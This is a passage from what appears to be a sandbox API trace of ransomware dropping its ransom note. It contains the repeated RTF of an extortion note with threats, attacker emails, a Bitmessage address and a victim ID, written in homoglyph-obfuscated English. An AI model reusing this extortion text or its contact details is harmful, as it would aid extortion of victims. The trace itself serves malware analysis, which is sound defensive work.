k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.331] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.331] CloseHandle (hObject=0x294) returned 1 [0273.331] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0273.332] GetLastError () returned 0x2 [0273.332] CreateFileW 